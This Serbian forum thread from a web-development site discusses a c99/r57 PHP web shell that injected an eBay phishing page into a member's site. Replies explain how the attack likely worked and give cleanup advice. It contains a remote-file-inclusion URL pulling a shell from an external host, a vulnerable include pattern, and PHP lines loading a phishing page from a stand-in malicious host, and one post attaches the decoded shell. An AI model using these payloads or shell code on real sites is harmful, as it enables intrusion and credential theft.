DevProTalk

Forumi IT profesionalaca
web development, web design, e-business, SEO


Idite nazad   DevProTalk > Web development i web aplikacije > Web Hosting, web serveri i operativni sistemi
Želite da se reklamirate ekskluzivno na ovoj poziciji? Javite se

Web Hosting, web serveri i operativni sistemi Komercijalni hosting, web serveri, bezbednost, operativni sistemi na serverima

Odgovori
 
Alati teme Način prikaza
Staro 17. 03. 2010.   #1
3banchi
branislav mandic mando
Wrote a book
 
Avatar 3banchi
 
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru
Default c99, r57 shell pojasnjenje i iskustva?

Pre dve godine sam na jednom starijem sajtu zaradio infekciju sa c99 ili r57 shell scriptom (nisam sad siguran). Nije bilo naivno...ubacio mi je potpuno novi template sa logom i stranicom e-buy gde trazi info o kreditnoj kartici. Prijava je stigla direktno od e buy-a mom hostingu koji je odmah suspendovao sajt. Za sve to vreme na mom domenu se pokazivao moj originalni sadrzaj, ali na neki nacin i u nekim meni nerazumljivim slucajevima je verovatno pozivan i taj lazni ubaceni template, dakle klasicni phishing.
Uglavnom, sredio sam to za par dana, vratio cist backup i posle vise nisam imao problema

Do sada nisam nesto istrazivao sve to...ali su me neke ovdasnje teme na DPT podsetile na problem bezbednosti.

Da li je neko imao iskustva sa ovim ili mi moze malo blize pojasniti na koji nacin to radi...zasto sam ja video normalno sajt, i u kojim slucajevima je ta skripta prikazivala fake stranicu?
Sacuvao sam i taj php fajl koji sam nasao ubacen, ali je kodiran (64 base) pa ne mogu nista da vidim...moze li se to nekako i sa necim dekodirati?
__________________
...
Ej, živote, teško ovo jebote,
mani me se živote, ti ga nabijem!
3banchi je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #2
misk0
majstor
Wrote a book
 
Avatar misk0
 
Datum učlanjenja: 30.01.2006
Lokacija: Lugano - Switzerland
Poruke: 1.251
Hvala: 219
106 "Hvala" u 67 poruka
misk0 će postati "faca" uskoromisk0 će postati "faca" uskoro
Pošaljite ICQ poruku za misk0 Pošaljite poruku preko Skype™ za misk0
Default

Naravno da mozes da ga dekodiras, otvoris sa PHPom i uradis decode i snimis to.

c99 koliko ja znam je shell koji omogucava napadacu da radi sta hoce od fajlova na serveru, a taj drugi nisam cuo.
misk0 je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #3
twix
Web designer
Professional
 
Avatar twix
 
Datum učlanjenja: 09.06.2005
Lokacija: New York
Poruke: 358
Hvala: 52
724 "Hvala" u 64 poruka
twix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskoro
Pošaljite poruku preko Skype™ za twix
Default

Sve te shell scripte mozes da preuzmes, testiras i includujes sa r57.gen.tr/

Generalno ako ti je sajt lose napisan, postoji sansa da napadac pozove scriptu na sledeci nacin:

tvojsajt.com/nesto.php?inc=http://r57.gen.tr/99.txt?
(primer, umesto ucitavanja lokalnog fajla/strane/itd. preuzima i izvrsava php file direkt na tvom serveru, gde dobija pristup listanju, citanju, brisanju, izmeni itd, zavisno od permisija, generalno dovoljno mu je da moze da procita recimo config fajl i da ti zagorca zivot)

Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci...

Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code).

Sve zavisi od servera, ja sam imao dosta problema sto se tih scripti tice, jer je klijent drzao stari sajt na Veratu, gde hvala Bogu nemaju nikakav backup, ja sam uradio novi sajt, postavio umesto starog, medjutim nakon sto je "haker" obrisao kompletan sajt trazio sam od administratora da mi posalje logove, pa sam posle par sati ustanovio da nije uploadovana scripta preko mog sajta i da je ista osoba (info: zone-h.org) to vece obrisala preko 90 sajtova, predpostavljam da je na nekom sajtu pronasao propust, uploadovao shell scriptu i isao redom u foldere i brisao sve sto je uspeo (mislim na citanje config fajlova, editovanje) itd.

Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\

Ono sto sam se uverio licno, postavi recimo r57 ili c99 na bilo koji hosting, pokreni i moci ces da "hakujes" vecinu sajtova na tom serveru. Adminu iz Verata sam pre godinu-dve postavio r57 i izlistao im sve sajtove koji su bili na tom serveru gde je klijent drzao sajt, pokazao im sta i kako funkcionise cisto da bi mogli da se zastite, nakon toga sam klijentu predlozio da zakupi hosting na drugom mestu, i naravno vise nije imao tih problema, da li su me u Veratu poslusali ne znam....

Poslednja izmena od bluesman : 18. 03. 2010. u 13:09.
twix je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #4
3banchi
branislav mandic mando
Wrote a book
 
Avatar 3banchi
 
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru
Default

Aha...decodirao sam na ovom decoderu...otvorio mi je bas c99 kompletan kontrolni panel ove scripte.
Koga interesuje da vidi sta tu sve ima, a ima svega!!! moze uciniti isto...fajl u prilogu:
Priloženi fajlovi
Tip fajla: zip laznjak.zip (91,4 KB, 1130 pregleda)
__________________
...
Ej, živote, teško ovo jebote,
mani me se živote, ti ga nabijem!
3banchi je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #5
AnonymousCoward
novi član
Na probnom radu
 
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
AnonymousCoward is on a distinguished road
Default

@3banchi, base64_decode() to što je u eval().

@twix, osiguravanje servera je malo više od instaliranja mod_security, koji je sam po sebi đubre.

Ne mora shell da bude na http:// Chini mi se da je upravo sa mod_security pre bila fora ftp://.../shell.txt... Toliko o zaustavljanju RFI-a.

Ne mora da bude php shell. Odnosno, disejblovanje suidnih funkcija. Može i perl (cgi) i "apache" shell (fora s' htaccess-om)

To sa phpBB-om je verovatno bilo uz pomoć LFI. Jedino tako može da se pokrene PHP shell u gif-u.

Moj predlog je da, uz ono što si ti naveo, pregleda sve PHP fajlove izmenjene u skorije vreme...uz nadu da ih nije touch.

Edit:
Ipak bi bilo gzdeflate(base64_decode({stvar iz eval()}))

Edit #2 (@msg #6): I give up...

Poslednja izmena od AnonymousCoward : 18. 03. 2010. u 01:41. Razlog: Nova poruka 3banchi-a
AnonymousCoward je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #6
3banchi
branislav mandic mando
Wrote a book
 
Avatar 3banchi
 
Datum učlanjenja: 30.10.2009
Lokacija: NS
Poruke: 1.241
Hvala: 261
486 "Hvala" u 189 poruka
3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru3banchi ima spektakularnu auru
Default

Citat:
Originalno napisao twix Pogledajte poruku
Videces u logovima, trazi zahteve koji sadrze "http://", ".txt", ".gif" ka drugim sajtovima, lako ces naci...

Pored includovanja, obrati i paznju na upload forme, jedno vreme je phpBB imao sledeci trip: registrujes se kao korisnik na forumu, skines shell scriptu, promenis joj extenziju u .gif, u korisnickom panelu postavis svoj avatar, i onda posto je poznata putanja za upload avatar pokrenes scriptu i dalje radis sta pozelis, kako su to uspeli nije mi jasno, ali mislim da je brzo zakrpljeno (da ne spominjem sto su ljudi u sliku ubacivali php code).
Ovo je interesantno...mislim da se upravo ovako nesto desavalo. Naime, primetio sam dan dva pre razotkrivanja hacka da mi se preko modula Google oglasa prikazuju poznate ikone Yahooa, e baya, Amazona i sl...pa sam to povezao sa nekom neregularnoscu samog Googlovog adsensea. Da stvar bude manje sumnjiva...to se pokazivalo samo na IE (kontam, naravno, IE je poznat po svojim glupostima u prikazu stranica...), a ne na ostalim browserima.
Tako da mi je sad ovo sto si naveo o ubacivanju php koda u gif i sl. extenzije i povezivanje toga sa shellom malo jasnije.


Citat:
Moj predlog ti je da promenis pass za bazu, ftp i instaliras mod_security ako si u mogucnosti :\
Da, to sam odmah uradio.
__________________
...
Ej, živote, teško ovo jebote,
mani me se živote, ti ga nabijem!
3banchi je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #7
AnonymousCoward
novi član
Na probnom radu
 
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
AnonymousCoward is on a distinguished road
Default

Ummm ja bih još jednom pokušao da se uključim u temu kada sam se već javio...a i volim ovakve teme

Da pokušam da pojasnim to sa shellom u gifu:
To sa PHP-om u njoj je slično steganografiji (sakrivanje teksta (valjda se tako kaže na srpskom )) u konkretnom slučaju PHP koda u slici. Dakle, slika i dalje ostaje validna (u smislu da se ne menja njen izgled i funkcionalnost)...zbog čega prolazi standardne provere da li je slika zaista slika koje često koriste pri aploadu.

Ali, internet media type aka MIME za gif je slika... Dakle, otvoriće mu se standardna slika a ne PHP shell (tj. neće se exec PHP kod). Osim ako nije nekim čudom na tom serveru gif = application/x-httpd-php

Sa LFI radi zato što to izgleda tipa:

Kôd:
include('images/'.$_GET['štagod']); //<-idealan slučaj = http://sajt.tld/skripta.php?štagod=aploadovana_slika_sa_php_kodom.gif
Pa se onda i taj PHP kod....

Tako da ovo što si zadnje napisao meni nema nikakvog smisla.

Reći ću ovako sada (just in case):
Ja bih pregledao logove da vidim kako je taj PHP završio gde je završio i fajlove koji su skoro izmenjeni jer mi i nije baš uteha menjanje passworda ako neko može opet da vidi to...

(Za svaki slučaj: pod onim touch sam mislio na: en.wikipedia.org/wiki/Touch_(Unix) ili php.net/touch ili....)
AnonymousCoward je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #8
bluesman
Goran Pilipović
Sir Write-a-Lot
 
Avatar bluesman
 
Datum učlanjenja: 18.05.2005
Lokacija: Beograd
Poruke: 5.450
Hvala: 288
1.247 "Hvala" u 446 poruka
bluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušatibluesman je osoba koju treba slušati
Pošaljite ICQ poruku za bluesman
Default

Molim vas samo pazite kada stavljate linkove do malicioznih sajtova, ubacujete attachmente sa malicioznim kodom ili ubacujete takav kod u tekst poruke, da ne osvane sutra kada otvorim DPT : Warning, this site can harm your computer.

Google to radi ne samo kada je sajt "uhakovan" nego čak i kada postoji na strani link do poznatog malware sajta.
__________________
Goran Pilipović a.k.a. Ugly Fingers Bradley f.k.a. bluesman
I don't always know what I'm talking about but I know I'm right!
bluesman je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #9
AnonymousCoward
novi član
Na probnom radu
 
Datum učlanjenja: 23.07.2009
Lokacija: U qtji; chuj gde...
Poruke: 23
Hvala: 4
5 "Hvala" u 3 poruka
AnonymousCoward is on a distinguished road
Default

Citat:
Za sve to vreme na mom domenu se pokazivao moj originalni sadrzaj, ali na neki nacin i u nekim meni nerazumljivim slucajevima je verovatno pozivan i taj lazni ubaceni template, dakle klasicni phishing.
Uglavnom, sredio sam to za par dana, vratio cist backup i posle vise nisam imao problema
Da pokušam da nagađam i ovo:

Verovatno je stavio neku banalnu stvar tipa:
Kôd:
if(isset($_GET['phishing'])) die(include('http://zlisajt.tld/phishing.html'));
//sa time što bi "phishing" (iz GET) zamenio nečim privlačnijim pa bi phishing link izgledao tipa: http://tvojsajt.tld/?redir=http://www.ibej.tld/UserAccount/login.se
pri vrhu stranice.
Ili, ako ta web aplikacija ostavlja cookies pri poseti ili logovanju (mada je to manje pouzdano),
može da proverava da li cookies (ili šta god da može da iskoristi u ovu svrhu) postoji i tako razlikuje validne posetioce od onih koje navlači na phishing.
(Podrazumevam da tvoji posetioci nisu meta.)
Kôd:
if(!isset($_COOKIE['poslednja_poseta'])) die(include('http://zlisajt.tld/phishing.html'));
P.S tek sada provalih da si ti zamenio fajlove bekap-om. Trebao sam pažljivije da čitam :| Sorry.

Elem, osim ako passwordi nisu bili problem, možda ono što napisah sa gledanjem skoro menjanih fajlova ipak možeš da iskoristiš uskoro
AnonymousCoward je offline   Odgovorite uz citat
Staro 18. 03. 2010.   #10
twix
Web designer
Professional
 
Avatar twix
 
Datum učlanjenja: 09.06.2005
Lokacija: New York
Poruke: 358
Hvala: 52
724 "Hvala" u 64 poruka
twix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskorotwix će postati "faca" uskoro
Pošaljite poruku preko Skype™ za twix
Default

@AnonymousCoward: Sto se linux administracije tice, znam na sta mislis, koristim linux 9 godina, ja na svom serveru i ne koristim mod_security, ali kao prvi "lek" i na osnovu ovih informacija, ne mogu mu davati druge savete.

@bluesman: ako mozes izmeni u mom postu onda linkove u recimo hxxp://r57[.]gen[.]tr/
twix je offline   Odgovorite uz citat
Odgovori



Pravila pisanja
Možete ne započinjati nove teme
Možete ne slati odgovore
Možete ne slati priloge
Možete ne izmeniti svoje poruke
vB kôd je Uključen
Smajliji su Uključen
[IMG] kod je Uključen
HTML kôd je Isključen
Pogledajte forum

Slične teme
Tema Početna poruka teme Forum Odgovori Poslednja poruka
httpool - iskustva Milan G. Marketing i SEO 38 23. 10. 2010. 21:59
citanje shell output-a tokom izvrsavanja komande ivanhoe PHP 3 07. 07. 2010. 02:07
Iskustva sa Silverstripe CMS SiniX Web aplikacije, web servisi i software 2 28. 01. 2010. 00:49


Vreme je GMT +2. Trenutno vreme je 01:01.


Powered by vBulletin® Verzija 3.6.8
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © DevProTalk. All Rights Reserved.
Mišljenja, saveti, izjave, ponude ili druge informacije ili sadržaji nastali na Sajtu su vlasništvo onoga ko ih je kreirao, a ne DevProTalk.com, tako da ne morate da se oslanjate na njih.
Autori poruka su jedini odgovorni za ovakve sadržaje. DevProTalk.com ne garantuje tačnost, kompletnost ili upotrebnu vrednost informacija, stavova, saveta ili datih izjava. Ne postoje uslovi pod kojima bi mi bili odgovorni za štetu ili gubitak koji je posledica bilo čijeg oslanjanja na nepouzdane informacije, ili bilo kakve informacije nastale kroz komunikaciju između registrovanih članova.
Web sajt može sadržavati linkove na druge web sajtove na Internetu ili neke druge sadržaje. Ne kontrolišemo niti podržavamo te druge web sajtove, niti smo pregledali bilo kakve sadržaje na takvim sajtovima. Mi nećemo biti odgovorni za legalnost, tačnost ili prikladnost bilo kog sadržaja, oglasa, proizvoda, usluga ili informacije lociranim na ili distribuiranih kroz druge web sajtove, niti za bilo kakvu štetu nastalu kao posledica takvih informacija. DevProTalk.com drži i čuva druga prava vlasništva na web sajtu. Web sajt sadrže materijale zaštićene copyright-om, zaštitne znakove i druge informacije o pravu vlasništva ili softver. Članovi mogu poslatu informacije zaštićene pravima vlasništva njihovih nosilaca i ona ostaju zaštićena bez obzira da li su oni koji prenose te informacije to naveli ili ne. Osim informacija koje su u javnom vlasništvu ili za koje dobijete dozvolu, nemate pravo da kopirate, modifikujete ili na bilo koji način menjate, objavljujete, prenosite, distribuirate, izvršavate, prikazujete ili prodajte bilo koju informaciju zaštićenu pravima vlasništva. Slanjem informacija ili sadržaja na bilo koji deo DevProTalk.com, Vi automatski dozvoljavate i predstavljate garanciju da imate pravo da dozvolite DevProTalk.com ili članovima DevProTalk.com bespovratnu, kontinualnu, neograničenu, globalnu dozvolu da koriste, kopiraju, izvršavaju, prikazuju i distribuiraju takve informacije i sadržaje i da iz takvih sadžaja koriste bilo koji deo u bilo koje svrhe, kao i pravo i dozvolu da koriste gore navedene sadržaje. Svi zaštitni znakovi (trademarks), logotipi, oznake usluga, firme ili imena proizvoda koji se pominju na ovom web sajtu su vlasništvo kojim raspolažu njihovi vlasnici.